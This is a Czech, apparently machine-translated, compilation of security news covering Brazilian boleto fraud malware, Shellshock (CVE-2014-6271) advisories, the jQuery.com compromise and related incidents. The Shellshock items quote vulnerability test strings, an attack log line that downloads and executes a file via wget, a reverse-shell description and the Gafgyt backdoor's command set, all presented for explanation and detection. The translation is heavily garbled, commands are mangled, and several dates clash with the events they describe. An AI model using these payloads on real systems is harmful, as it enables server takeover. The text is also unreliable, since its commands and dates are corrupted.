Samozřejmě boleto generované má přesně stejnou hodnotu a datum splatnosti, co jste chtěl, ale číslo ID pole má nová data ...

Boleto_malware_45

"Tvůj nový boleto byl vytvořen a zaregistrován. Platit to dnes"

Není to jen malware: na Boleto gangy používají všechny možné způsoby, jak podvádět uživatelů a krást jejich peníze. Velmi rozšířený útok jako tento následek mnoho obětí.

On-line a off-line oběti

Tyto útoky byly především notoricky známé pro jejich "crossover" do offline světě , krást od lidí, kteří nepoužívají internetové bankovnictví nebo koupit věci on-line. To může dokonce krást od lidí, kteří se nikdy s připojením na internet v jejich životě. Několik infikovaných počítačů v tisících obchodech po celé zemi začaly vytvářet podvodné boletos pro své zákazníky . Po skončení tisku a zaplatil poslali peníze přímo na účty počítačovými zloději.

Toto zažehlo skutečnou lavinu trojské koně stejnou technikou, a několik obchodů bylo těžce postiženy. Mnoho společností, sdružení obchodníků a brazilská vláda všech vydaných výstrah pro své zákazníky o podvodných boletos vydaných těmito trojské koně (například 1 , 2 , 3 , 4 ). Hodně peněz bylo ukradeno a dokonce i nyní to podvod stojí banky, obchody a zákazníky drahá.

V některých případech čerpat svou pozornost, jako to jeden z podnikatelka z Campo Grande - její společnost ztratila BRL 183000 (kolem nás 80.000dolar):

Boleto_malware_46

Tato částka byla ukradena jen 3 dny ...

Policie ve státě Minas Gerais vydal výstrahu obyvatelům, varuje, že podvodníci už ukradl kolem BRL 25000 (US 10.000 dolar) z podniků:

Boleto_malware_47

Policie registrován 12 případů ve stavu

Pro měření tohoto problému jsme dělali závrt o C & C a našel několik obětí - jen v jednom škodlivému serveru protokoly registrováno více než 612 tisíc žádostí za 3 dny . Každý z nich hledal podvodné pole ID, které mají být vstříknut do boletos generován na infikovaných počítačů:

Boleto_malware_48

Požadavky na sinkholed na C & C

Při pohledu na tyto hodnoty nás vedla se zeptat: kolik peněz bylo ukradeno? Kolik obětí? Není to snadné se dostat toto číslo, pokud nemáte důkladně rozumět brazilské kyberkriminality prostředí.

8000000000?

V červenci 2014 několik sdělovacích prostředků se vztahuje nějaký RSA výzkum o " boj proti kyberkriminalitě systému odkryl v Brazílii "- těmito útoky proti boletos. Hned od začátku nabízí šokující číslo: možná, stejně jako US 3750000000 dolarů odcizení BRL 8600000000 . Jinými slovy, bylo by to největší počítačová kriminalita loupež známé k dnešnímu dni. Chcete-li porovnat, jak velký je toto číslo, Banco do Brasil, největší banka v zemi, z nás dělá 6600000000 dolarů v ročních zisků. Takže protivníci ukradli polovinu peněz z velké banky? Ne tak rychle ...

RSA nalezeno 495793 boletos a 192.227 obětí v jejich vyšetřování. Jakmile je uvnitř ovládacího panelu, našli hodnoty všech plateb, které se přesměrováni virus. Sčítají, tyto platby trumfl 3750000000dolary značku USA. Toto číslo však zahrnuje vše - platby neučinil a platby, které byly provedeny, ale neschválené banky (jak byl zjištěn podvod). To zahrnuje také všechny zkušební platby provedené jinými výzkumníky, kteří se snaží pochopit chování malware či dokonce zkoušek provedených padouchem, nebo dokonce duplicitní položky jako někteří zákazníci snažili generovat stejné Boleto několikrát.

Boleto_malware_49

C & C zobrazování testování a duplicitní záznamy

Počítání každý záznam v C & C vyústilo v této absurdní počtu R 8000000000 dolarů, což v průměru na R 16.000 dolarů za každý Boleto. Tato hodnota je nereálné a chybné - většina boletos stojí mnohem méně. Oni také odhaduje počet obětí na 192.227. Oni dělali toto tím, že počítá unikátní IP adresu, která je velmi nespolehlivá. Stejně jako v jiných částech světa, většina spojení v Brazílii použít dynamické adresy IP. Jiné chyby v této zprávě RSA bylo zdůrazněno LinhaDefensiva komunity v tomto článku .

Tak kolik bylo skutečně ukradeno s podvodnými boletos? Ve skutečnosti pouze banky mohou navrhnout konečný součet. Brazilská federace bank (FEBRABAN) zveřejňuje kombinované ztráty, kterým čelí všechny banky díky elektronickému podvodu každý rok. Rok s největším ztrátám doposud bylo 2011. Ten rok, přišli R 1500000000 dolarů, nebo US 680000000 dolarů.

Jedna věc je jistá: Brazilské zločinci se pohybují rychle, přijímá nové techniky, aby i nadále útočí a krade peníze z boletos. Nebudou ztrácet čas v případě, že podvod nebyl ziskový pro ně.

Jak vás a vaši firmu chránit

To je častá otázka od uživatelů a podniků v Brazílii, kteří pracují s boletos. Je možné používat tento způsob platby bezpečně?

FEBRABAN, brazilské federace bank, navrhuje využít DDA (Debito Direto autorizado, Autorizovaný souhlasu s inkasem). To nahradí tištěnou Boleto s elektronickým účet automaticky výběr prostředků z bankovního účtu jiné osoby po obou smluvních stran předem schválit dohodu.

Nicméně některé brazilské společnosti se obávají o vyšší náklady spojené s DDA. V tomto případě se doporučují vydání boletos ve formátu PDF generované na straně serveru , namísto použití formátu HTML. V současné době není Trojan můžete upravit PDF Boleto.

Boleto_malware_50

Boleto generovány ve formátu PDF: bezpečnější než HTML

Zákazníci společnosti Kaspersky Lab jsou chráněny před těmito útoky - Safe Money technologie uvedené v našich výrobcích je může zablokovat zcela tím, že nabízí možnost otevírání stránek v bezpečném režimu, kdy žádný škodlivý kód by mohl vdechnout data. Tím je zajištěno, že mohou být generovány boletos bezpečně:

Boleto_malware_51

Kaspersky předcházení podvodům platforma také zastaví trojské koně navržen tak, aby zachytit HTTPS provoz pomocí Fiddler. KFP porovnává tento falešný certifikát Houslista s reálným certifikátu používaného banky nebo platební služby, a pak blokuje přístup.

Boleto_malware_52

Kaspersky prevence podvodů v akci, blokování nespolehlivé připojení SSL

Závěry

Dnes tyto útoky jsou velké bolesti hlavy pro všechny zúčastněné strany v nákupu a prodeji v Brazílii - banky, podniky a zákazníky. Je-li zákazník hit s falešným Boleto říká, že to není jeho chyba, protože zaplatil. Obchody viní banku za to, že řádně zpracovat platbu. Banka tvrdí, že je odpovědný pouze za zpracování Boleto, ne pro obsah papírování. Buck jde dokola a dokola ...

Chcete-li dokončit scénář brazilské zločinci specializují na krádeže identity. Často otevřený bankovní účty ve jménu nevinných lidí, kteří nevědí nic o situaci pomocí ukradených osobních údajů. S penězi mul a účtů otevřených jménem mrtvých; to je snadné pochopit, proč je tak obtížné sledovat ukradené peníze.

Boletos je metoda velmi lokální a výrazné platba; většina ostatních zemí nemají nic podobného, ​​a ani nevím, co boleto je. Bohužel bezpečnostní společnosti věnují jen malou pozornost Brazílii a chybět mnoho otázek, které pouze místní inteligence dokáže rozpoznat a nabídnout odborné znalosti. Místní zločinci jsou přísně omezuje jejich útoky na brazilských IP a nainstalovat pouze své trojské koně na strojích provozovaných v brazilské portugalštině.

Brazilské zločinci jsou po stejnou cestou jako jejich protějšky v Rusku a Číně, s velmi specializovanými pro boj proti kyberkriminalitě scéně, kde útoky na místní obyvatele vyžadovat zvláštní úsilí, aby správně pochopit. Oni jsou také sdílení znalostí u zločinci z východní Evropy, export nové techniky, jako tenhle zde popsaného jasně inspirovaný SpyEye, dělat kódu injekci.


"Bash" (CVE-2014-6271), zranitelnost - Q & A
26.9.2013 Zranitelnosti

Co je to "bash" zranitelnost?

"Bash" zranitelnost, ve skutečnosti popsán jako CVE-2014-6271, je extrémně výkonný zranitelnost vzhledem k jeho vysoké dopadu a snadnost, s níž může být využit. Útočník může jednoduše spouštět příkazy na systémové úrovni, se stejnými oprávněními jako dotčených služeb.

Ve většině příkladů na internetu právě teď, útočníci jsou na dálku útočí na webové servery hosting CGI skripty, které byly napsány v bash nebo předávání hodnot shell skriptů.

V době psaní tohoto článku, chyba již byla použita pro nekalými úmysly - infikuje zranitelné webové servery s malware, a také útoky hackerů. Naši výzkumníci se neustále sbírat nové vzorky a projevy infekce na základě této zranitelnosti; a další informace o tomto malware budou brzy zveřejněna.

Klíčovou věcí pochopit, je to, že chyba není vázán na konkrétní službu, například Apache nebo Nginx. Spíše zranitelnost spočívá v bash shellu tlumočníka a umožňuje útočníkovi přidat příkazy na úrovni systému proměnných prostředí bash.

Jak to funguje?

Budu používat stejné příklady, které jsme viděli v rad a proof-of-concept kód, které byly publikovány, vysvětlit, jak to funguje. Máte-li skript CGI na webovém serveru, tento skript automaticky načte některé proměnné prostředí, jako je například IP adresa, verzi prohlížeče a informace o místním systému.

Ale jen si představte, že byste mohli nejen projít této běžné systémové informace na skript CGI, ale může také říct, skript spouštět příkazy na systémové úrovni. To by znamenalo, že - bez nutnosti jakékoli pověření na serveru - jakmile máte přístup k CGI skript by to čtení proměnné prostředí; a pokud tyto proměnné prostředí obsahovat využívat řetězec, skript by také spustit příkaz, který jste zadali.

Co jej činí jedinečným?

Tato chyba zabezpečení je unikátní, protože je to velmi snadné zneužít a dopad je neuvěřitelně těžké - v neposlední řadě proto, že z částky zranitelných cílů. To není jen vliv na webové servery, ovlivňuje veškerý software, který používá interpret bash a čte data, které můžete ovládat.

Vědci se také snaží zjistit, jestli ostatní tlumočníci, jako je PHP, JSP, Python nebo Perl, jsou také ovlivněny. Ddepending o tom, jak se píše kód, někdy interpret skutečně používá bash vykonávat určité funkce; a pokud je to váš případ, může se stát, že ostatní tlumočníci by mohly být také použity k využití CVE-2014-6271 zranitelnost.

Dopad je neuvěřitelně vysoká, protože existuje mnoho embedded zařízení, které používají CGI skripty - například směrovače, domácích spotřebičů a bezdrátových přístupových bodů. Oni jsou také zranitelní a v mnoha případech obtížné opravit.

Jak rozšířená je to?

To je velmi těžké říct, ale víme, že z našich zpravodajských systémů, které lidé začali rozvíjet využije a červy přímo za informace zranitelnost byla zveřejněna - vědci i whitehat a blackhat skenování Internet pro zranitelné servery.

Je příliš brzy na to vědět, jak rozšířený je to, ale vím, že z mého vlastního výzkumu, že existuje velké množství webových serverů se systémem CGI skripty, a jsem si jistý, že budeme také mnoho dalších typů zneužití vyvíjeny, že zaměřit se na místní soubory a síťové démony. Tam byly diskuse týkající se jak OpenSSH a DHCP klienty, kteří se náchylné k útoku stejně.

Jak mohu zkontrolovat, zda můj systém / web byl ovlivněn?

Nejjednodušší způsob, jak zkontrolovat, zda je váš systém zranitelný je otevřít bash-shell na vašem systému a spusťte následující příkaz:

1
"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

V případě, že shell vrátí řetězec "zranitelný", měli byste aktualizovat váš systém.

Také tam jsou nástroje pro odborné publikum tam venku, které mohou být použity k ověření, zda váš server je ovlivněn touto chybou.

Poradenství o tom, jak vyřešit tento problém

První věc, kterou musíte udělat, je aktualizovat své bash verze. Různé distribuce Linuxu nabízíme opravy této chyby zabezpečení; a ačkoli ne všechny patche se ukázala být zcela účinná, záplatování je první věc. Služby jako Heroku vytlačila opravy, které budou auto-platí do 24 hodin, ale vývojáři mohou donutit aktualizace taky.

Pokud používáte nějaké IDS / IPS Chtěl bych také doporučujeme přidat / načtení podpisu za to. Mnoho veřejných pravidel byly zveřejněny.

Také zkontrolujte nastavení webserveru. Pokud existují nějaké CGI skripty, které nepoužíváte, zvažte jejich zakázání

Je hrozbou pro on-line bankovnictví?

Tato zranitelnost je aktivně využíván na cílové servery hostované na internetu. Dokonce i některé pracovní stanice se systémem Linux a OSX jsou zranitelné, ale útočník by bylo ještě třeba najít způsob útoku, který bude pracovat na dálku proti vaší pracovní ploše. Proof of concept cílení * nix stanice dhcp klienty byl propuštěn, ale většina politik stanice dhcp procesu zabránit akcím tento druh využití ve výchozím nastavení.

Exploit pokusy, které jsme pozorovali, se zaměřují na serveru zranitelnosti a stahování DDoS roboty pro další DDoS útoky. Je pravděpodobné, že servery hosting PII a manipulaci s citlivými obchodníka údaje jsou napadeni, stejně, ale my jsme ještě pozoroval. Existují obchodníci, které bohužel nemají opravu rychle.

Mohu zjistit, zda někdo zneužil tuto proti mně?

Doporučujeme prohlížení protokolů HTTP a zkontrolujte, zda je něco podezřelé. Příkladem nebezpečného vzoru:

1
192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

Tam jsou také některé patche pro bash, kteří se přihlašují každý příkaz, který je předán do interpretu bash. To je dobrý způsob, jak zjistit, jestli někdo zneužít váš počítač. To nezabrání někomu zneužití této chyby zabezpečení, ale bude protokolovat akce útočníkům v systému.

Jak vážná je hrozba?

Tato chyba je velmi nebezpečné opravdu, ale ne každý systém je zranitelný. Musí být splněny zvláštní podmínky pro webový server, které mají být využity. Jedním z největších problémů je, že teď, když jsou náplasti zveřejněny budou vědci hledat jiné způsoby, jak využít bash, prozkoumat různé podmínky, které mu umožňují být využit, atd Takže náplast, která pomáhá zabránit vzdálené spuštění kódu, nelze dělat nic proti , například soubor přepsat. Takže tam bude pravděpodobně řada patchů a mezitím systémy jsou stále zranitelné.

Je to nový Heartbleed?

No, je to mnohem jednodušší pro cybercriminal využít než Heartbleed. Také v případě Heartbleed, cybercriminal mohl ukrást pouze data z paměti, doufají, že najdou něco zajímavého. Naproti tomu, bash zranitelnost umožňuje plnou kontrolu nad mnohem možného systému. Takže by se mohlo zdát, že je mnohem nebezpečnější.

Může být použit v budoucích APT útoků?

To by mohly být použity pro budoucí vývoj malware, samozřejmě. Škodlivém by mohly být použity pro automatické testování infrastruktury pro takové chyby, infikovat systému nebo útoku ji jiným způsobem.


Shellshock a jeho inovátoři
26.9.2013 Zranitelnosti

Krátce po zveřejnění Bash chyby názvem " Shellshock "jsme viděli první pokusy zločinců Chcete-li využít této rozšířené zranitelnosti také známý jako CVE-2014-6.271 .

Nejnovější pokusy, které vidíme získat kontrolu nad internetovým serverům stačí vytvořit novou instanci bash a přesměrovat ji na vzdálený server naslouchá na určitém portu TCP. To je také známý jako reverzní-connect-shell. Zde je příklad toho, jak se zdá, že útok na webserver logu:

shellshock_reverse-shell_ortloff

Útočník naslouchá na IP adresu 195.xx.xx.101 na TCP portu 3333 , zatímco původ útoku je IP adresa 94.xx.xx.131 . Chcete-li získat kontrolu nad serverem s touto metodou, žádné externí binární soubory jsou zapojeny.

V dalším probíhajícím útoku zločinci používají speciálně vytvořené HTTP požadavek k využití Bash zranitelnosti k instalaci Linuxu backdoor na serveru oběti. Jsme detekci malware a jeho varianty jako Backdoor.Linux.Gafgyt.

Binární obsahuje dvě napevno IP adresy. První z nich se používá pouze oznámit zločince o nové úspěšné infekce. Druhá IP adresa se používá jako příkaz-a-řídicí server (C & C), komunikovat přímo s malware běžící na infikované webserver.

Následující obrázek ukazuje příklad, jak tato komunikace může vypadat takto:

shellshock_traffic-example_ortloff

V souladu 1 malware odešle zprávu "Ahoj" a říká, že útočník, který architektura byla binární zkompilovaný pro - zde je to x86.

shellshock_hello-message_ida_ortloff

Nezávisle příkazů zaslaných útočníky, backdoor pošle " PING "žádost každých 30 sekund, což je odpověď s" PONG "ze serveru (pro lepší čitelnost Odstranili jsme některé z PING / PONG -pairs z výše uvedeného příkladu ).

Příkazy začínají vždy " ! * ". První příkaz vidíme v tomto případě je " skener na "příkaz v souladu 10. To říká binární skenování náhodné IP rozsahy pro hostitele přijímání telnet na portu TCP 23. Pokud se taková hostitel pokusí přihlásit pomocí napevno seznam společných výchozích kombinací uživatel / hesla.

shellshock_verylitte_dict_ortloff

K dispozici je také primitivní honeypot otisky prstů rutina implementována, který využívá " BusyBox ", jak popsal Internet Storm Center zde .

shellshock_busybox_honeypot_fingerprinting_ortloff

Dalším úkolem zločinci začít krabici oběti je zahájeno v souladu 14. Zde je řečeno, binární provádět zaplavení IP 69.xx.xx.67 pomocí protokolu UDP na 50 sekund. V souladu 17 útočníci zastavit záplavu, aby jej restartovat v řadě 18, se zaměřením 178.xx241 . " Žádný zabil. " odpověď v souladu 21 se zobrazí, protože záplavy instrukce z linky 14 byl již ukončen, když se útočník snažil zastavit pomocí " *! KILLATTK "v řádku 17.

Zde je kompletní seznam příkazů backdoor akceptuje:

! * PING - Odpovědi na "PONG!" * SH! - spustit libovolný příkaz shellu * GETLOCALIP! - Odpovědi na "moje IP: $ ipaddr" ! * Scanner | OFF - skenování náhodné sítě, provést velmi malou slovníkový útok (viz výše), zkouška, zda cíl je honeypot

! * HOLD - Držte povodně ! * Junk - Proveďte nezdravé povodeň ! * UDP - Proveďte UDP Flood * TCP! - Proveďte TCP oken * KILLATTK! - Zabij všechny povodeň ! * LOLNOGTFO - Ukončit backdoor.



Související binární soubory:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b


Stará chyba v shellu Bash postihuje půl miliardy zařízení

26.9.2012 Zranitelnosti
Experti na internetu objevili bezpečnostní riziko, které postihuje stovky milionů počítačů, serverů a dalších zařízení s operačními systémy typu Unix, Linux nebo OS X.

Díra byla objevena v jednom z nejrozšířenějších prostředí příkazového řádku známém jako Bash, který je součástí mnoha unixových a linuxových systémů, stejně jako operačního systému pro OS X od Applu. Chyba, jíž experti přezdávají „Shellshock“, může být využita k získání vzdálené kontroly nad téměř jakýmkoli systémem obsahujícím Bash. Podle některých odborníků je nové riziko mnohem nebezpečnější, než Heartbleed, o němž se hodně psalo v dubnu tohoto roku.

„Zatímco Heartbleed umožňoval zjistit o uživateli co nejvíc věcí, Shellshock umožňuje převzít přímou kontrolu nad systémem,“ uvedl profesor Alan Woodward z University of Surrey. Hearbleed ohrožoval asi půl milionu počítačů na celém světě, Shellshock se však podle konzervativních odhadů expertů týká minimálně pěti set milionů zařízení. Problém je o to závažnější, že řada webových serverů používá software Apache, který využívá právě Bash.

Bash (Bourne-Again SHell) je příkazový řádek na mnoha počítačích s Unixem. Unix je operační systém, na němž je postavena nebo se v něm inspiruje řada dalších OS – například Linux nebo OS X. O novém riziku na svých stránkách informoval i mimo jiné US Computer Emergency Readiness Team (US-Cert) s tím, že správci by měli co nejdříve použít bezpečnostní opravy. Jiní bezpečnostní experti však varovali před tím, že aktualizace jsou „neúplné“ a počítače plně nezabezpečí.
 

Shellshock je na škále od jedné do deseti označen jako desítka, tudíž už ani nemůže být více nebezpečný. Jednak je zde značný počet uživatelů, kteří mohou být postiženi, hlavně je však pro Shellshock již volně dostupný exploit a ví se, že kyberzločinci aktivně hledají webové stránky, které by byly vhodné k provedení útoku. Servery nyní podle expertů chrání především fakt, že kybernetičtí útočníci jsou líní a pouze kopírují to, co již jiní vymysleli. Hledání exploitů je těžká práce, tudíž většina útočníků pouze využívá již publikované informace.

I když bezpečnostní experti ze společnosti Rapid7 ohodnotili Bash jako 10/10 co do závažnosti, označili jej jako „málo“ sofistifikovaný. „S použitím této díry útočníci mohou potenciálně převzít kontrolu nad operačním systémem, přistupovat k citlivým informacím, provádět změny a tak dále,“ uvedl Tod Beardsley z Rapid7. Jak uvedla společnost Kaspersky Labs, zranitelnost již byla kyberzločinci zneužita k napadení webových serverů. Běžným domácím uživatelům, kteří mají obavy z bezpečnosti, pak profesor Woodward doporučuje sledovat webové stránky výrobců hardwaru, především směrovačů, a čekat na aktualizace.


Aktualizace CVE-2014-6271: Chyba zabezpečení v bash (Shellshock)
25.9.2014 Zranitelnosti
(Tento deník bude aktualizován s odkazy na příslušné zdroje brzy)

Včera, zranitelnost v bash bylo oznámeno, že byl původně nalezen Stephane Schazelas. Tato chyba zabezpečení umožňuje spuštění libovolného kódu v bash stanovením konkrétních proměnných prostředí. Později Travis Ormandymu vydala druhý exploit, který bude pracovat na opravené systémů. Prokázání, že patch včera propuštěn je neúplný.

Jaký je dopad této chyby zabezpečení?
Zpočátku chyba nevypadá všechno vážně. Spouštění příkazů je to, co bash používá. Ale v tomto případě, kód může být provedena bez uživatelova záměru nastavením proměnné prostředí.

Nejproblematičtější situace je bash skripty provedeny pomocí cgi-bin. Specifikace CGI vyžaduje webový server převést HTTP hlavičky požadavku dodaných klientem proměnné prostředí. Pokud bash skript je volán přes cgi-bin, může útočník použít k spuštění kódu jako webový server.

Jiné, méně pravděpodobné scénáře zahrnovat SSH, což lze nastavit proměnné prostředí, ale musely by být nastavena na serveru v konfiguračním souboru. Klienti DHCP může být v některých případech spustit bash skripty a použít proměnné prostředí dodávané serverem. Tento případ může být zneužitelné, pokud se uživatel připojí k nedůvěryhodné DHCP serverem ("cofeehouse wifi").

Mám použít opravu?
Ano. Náplast se opravit jeden aspekt zranitelnosti. Nicméně, oprava není kompletní a není zcela opravit chybu. Nejsme si vědomi žádných vedlejších účinků náplasti.

Jaké jsou další možnosti? Co jiného bych měl dělat?
Vzhledem k tomu, patch je neúplná, měli byste se pokusit zavést dodatečná opatření na ochranu systémů. Různé Intrusion Detection System (IDS) a Web Application Firewall (WAF) dodavatelé vydali pravidla pro blokování vykořisťování. Uvědomte si, že tato pravidla mohou být neúplné stejně. Mnoho pravidel, které jsem viděl zatím jen podívat na řetězec ") {(", která byla přítomna v původní důkaz konceptu využití, ale může být snadno změnit například přidáním více či různých bílých míst.

Dalo by se přepnout výchozí shell alternativu jako ksh nebo sh. Ale to je, bude pravděpodobně rozbít existující skripty. Různé mušle používají mírně odlišné syntaxi.

Na mnoha vestavěných systémů, které již může použít alternativní shell ("busybox"), který není zranitelný.

Jak mohu najít zranitelné systémy?
Pokud se můžete přihlásit do systému, můžete použít jeden z těchto zkušebních řetězců:

Chcete-li zjistit, zda se oprava, můžete použít původní testovací řetězec:

env x = '() {} ;;; echo zranitelný "sh-c" echo toto je test "
Pokud se oprava, ale chci ukázat, že jste stále zranitelné, můžete
použít tento příkaz:

env X = '() {() => \' sh-c "echo termín";
Tento příkaz vrátí chybu na opravenou bitové kopie instalace systému, ale to bude ještě
vytvořit prázdný soubor s názvem "echo".

Existují různé moduly pro zranitelnost skenery hledat zranitelné systémy. Můžete také použít rychlé vyhledávání Google, které by mohly pro zranitelné webové servery:
filetype: sh inurl: cgi-bin stránky: [Vaše doména]
Tato Google zkontrolovat můj návrat skripty, které používají jiné skořápky a pak bash.

Dávejte pozor, aby zkontrolovat webové servery ve vestavěných systémech, jako jsou směrovače, protože může pracovat nejen bash skripty, ale mohou tak učinit na zvýšenými oprávněními.

Jsou systémy již zneužita?
Viděli jsme zprávy vyhledává zranitelnosti.


Pozornost * NIX administrátoři, je čas opravit!
25.9.2014 Zranitelnosti
V posledních letech jsme zvykli na Microsoft záplaty, důležitých, kritické těch, které mohly znamenat váš systém plně zranitelný, pokud jste nepoužili je. Asi jsme se stala tak zvyklí, že někdy zapomínáme, že naše servery Linux také nutné opravy.

Dnes jsem se dozvěděl o kritické Bash náplast, která se zabývá CVE-2014 do 6271. Dle poradenství :

"Chyba byla nalezena na cestě Bash hodnoceného určité speciálně vytvořené proměnné prostředí. Útočník by mohl využít tuto chybu potlačit nebo bypass prostředí omezení spouštět příkazy shellu. Některé služby a aplikace umožnit vzdálené spuštění neověřených útočníkům poskytovat proměnné prostředí, které jim umožní využívat tento problém. "

Náplasti jsou již připraveny pro většinu distribucí Linux, jako je RedHat a Debian, a tak ztrácet čas.


RSA prý umožní identifikovat útok dřív, než přijde

25.9.2014 Zabezpečení
Advanced Security Operations Center (SOC), integrovanou sadu technologií a služeb, které organizacím umožňuje identifikovat hrozby dříve, než dojde k útoku, představilo RSA. Představuje kombinaci systémů SIEM (správa bezpečnostních informací a incidentů), analýzy síťových paketů a detekci ohrožení koncových bodů.

Díky tomu podle výrobce dovoluje rychle odhalovat útoky, které často zůstávají nepovšimnuté samostatnou logickou správou SIEM a tradičními bezpečnostními nástroji zaměřenými na hranice sítí, jako je antivirový software, brány firewall a systémy ochrany před průniky do sítě.

Konkrétně jde o zapojení nástrojů Security Analytics, ECAT a Archer Security Operations Management a služeb Advanced Cyber Defense Practice.

Řešení funguje tak, že se sbírají ucelená data o stavu sítě, systémů a koncových bodů. Na jejich základě pak novinka dokáže včasně detekovat incidenty a v případě podezření okamžitě zahájit hloubkovou analýzu, která umožní pochopit typ a rozsah problému.

Více než 400 síťových a protokolových parserů provádí časovou analýzu všech protokolů a síťových relací, v nichž vyhledává klíčové indikátory hrozeb a generuje metadata, která pak bezpečnostní analytiky směrují na nejzávažnější problémy.

Sleduje a analyzuje více než 250 zdrojů událostí, aplikuje více než 275 předdefinovaných korelačních pravidel a využívá asi 100 šablon sestav. Dokáže také hledat vzájemné souvislosti mezi síťovými pakety, daty protokolu NetFlow a informacemi z koncových bodů.

Produkt lze navíc škálovat na základě aktuálních potřeb.


jQuery.com Kompromis: Nebezpečí třetí strany Moderuje obsah
24.9.2014 Incidenty
jQuery je populární rámec Javascript, používá mnoho webových stránek (včetně isc.sans.edu). jQuery poskytuje mnoho funkcí, jako je snadný přístup k webservices, stejně jako pokročilé funkce uživatelského rozhraní. Pokud používáte jQuery, stránky mají možnost stáhnout a hostit kompletní kód, nebo nechat jQuery.com a je to CDN (Content Delivery Network) hostit kód.

Tam jsou dvě výhody umožňující jQuery.com hostit kód:

Výkon: Kód je obvykle doručena rychleji a uživatel již může mít kód mezipaměti když navštívil jinou stránku, která používala CDN hostil kopii jQuery.
Automatické aktualizace: Aktualizace jQuery jsou tlačeny k CDN vývojáři jQuery a webových stránek pomocí to bude automaticky dostávat aktuální kopii.
Na druhé straně, tam je důležitý nedostatek, a hlavní důvod, proč jQuery kód isc.sans.edu je hostována na našich serverech: S kód je "naslepo" v ceně od třetí stránky třetích stran, je možné, že kompromis této třetí místo strany bude mít vliv na bezpečnost vašich stránek.

Je smutné, že právě to se stalo v souladu s RiskIQ s jQuery.com [1]. Webové stránky byly napadeny a škodlivý kód byl injekčně přesměrování uživatele na škodlivé stránky. Naštěstí, knihovna jQuery nebyla ovlivněna. V opačném případě by se mnoho dalších lokalit byly odhaleny, a by byly ovlivněny návštěvníci těchto stránek. Tak je tomu zejména štěstí jako útok se zdá být cílené. Doména přesměrování použitá v tomto útoku byl jQuery-cdn.com. Že doména byla zaregistrována v den útoku byla poprvé všiml.

Particulary o je fakt, že jsem nemohl najít žádné prohlášení o útoku na jQuery.com. Pokud někdo má odkaz, dejte mi prosím vědět.

[1] http://www.net-security.org/malware_news.php?id=2869


Výzkumník vytváří využít k ohrožení počítače podvodníky "
24.9.2014 Kriminalita
Dokonce i když jste nikdy osobně řešit "Podpora systému Windows" podvodníky, je pravděpodobné, někdo víte, udělal, nebo jste slyšeli o těchto typů podvodů. Tyto podvodníci se obvykle snaží přimět uživatele k instalaci legitimní Remote Desktop software na svém počítači, který umožňuje podvodníci převzít počítače a krást informace, instalaci malwaru, nebo prostě aby to vypadalo jako v počítači má problémy s malware a požádat o peníze, aby se "opravit" to. Existuje řada aplikací dálkového ovládání na trhu , a patří k nejoblíbenějším ty s podvodníky je Ammyy správce , který byl také používán na podvodníky, kteří cílových prarodiče INFOSEC výzkumník a Metasploit vývojáře Matt týdny. Tato narušení inspiroval jej, aby našel způsob, jak (poměrně dobře informovaných), obětí se obrátit tabulky na podvodníky, ne jen vypnutí pokus o podvod okamžitě nebo navléci scammer spolu několik minut předtím, než to samé. Týdny rozhodl prozkoumat software Ammyy správce a zjistit, zda by mohl najít chybu, která může být zneužita. Chvíli mu trvalo, než - a popsal celý proces ve velmi pečlivém místo - ale podařilo se mu najít. Skutečnost, že Ammyy správce nepoužívá ASLR a DEP ochranu, tvorbu využít pro chybu bylo poměrně snadné. Psaní shell kódu pro přímý útok byl trochu složitější, poznamenal, ale nakonec se mu podařilo "dát dohromady Metasploit modul, který bude generovat textovou přepis poslat na vzdáleném konci pomocí vstřikovaného DLL na pohybující se Ammyy instance , který bude využívat vzdálený konec se snaží ovládnout počítač. " "Aby se to spustit, stále musíte spustit Ammyy správce uložit textovou přepis ve svém adresáři, a aplikujte DLL do procesu, který se nahraje do přepis . Tak jsem dal dohromady spustitelný balíček automatizovat to, "vysvětlil. Udělal balení k dispozici ke stažení , ale pouze tehdy, pokud jste výslovně souhlasí s tím, že nebudete používat pro zlé účely a s vědomím, že nemá přehlížet nelegální činnost (pomocí tohoto využít ohrozit počítač podvodník je, technicky vzato, v mnoha zemích nezákonné. Vysvětlil také, že zatímco činem bojoval proti testovacích strojích, se mu to nezkusit proti skutečné podvodníky. "Nemám normálně uvolnění Zero Day využije, ale udělal jsem výjimku v tomto případě, protože dostal hlášení a využití Ammyy admin Považuji za velmi nepravděpodobné, které mají být použity k ohrožení nevinných obětí, "poznamenal. "Hlavními uživateli ohrožené kompromisu jsou skupiny podvodník. Doufejme, že to bude odstrašující pro ty, kdo by se pokusil ohrozit a využít nevinných obětí."


Google Apps skripty mohou být snadno zneužity podvodníky
24.9.2014 Hrozby
Andrew Cantino, VP of Engineering v Mavenlink, ale také chyba lovec ve svém volném čase, zjistil, že Google Apps Skripty mohou být zneužity útočníky do e-mailu uživatelům přístup "a další informace. "Google Apps Script je výkonný skriptovací prostředí, poskytuje Google které mohou způsobit ověřené žádosti vůči uživatelských dat uvnitř vlastností Google, "vysvětlil a poukázal na to, že při povolování Apps Script Google, uživatelé nejsou jasně řečeno, že to umožňuje přístup třetích stran ke svým údajům, který může dělat sociální inženýrství útoky příliš snadné. "Horší je, že Google Apps Skripty jsou v doméně Google, tak i zdatným uživatelům, kteří hledají podezřelých domén bude se zmást," řekl poznamenal . Aby jí dokázal svou pravdu, on vytvořil aplikaci, kterou nazval "Google Security Upgrader "pomocí jednoduchého Google Apps Script udělal, a které pouze vytváří nový štítek Gmail.

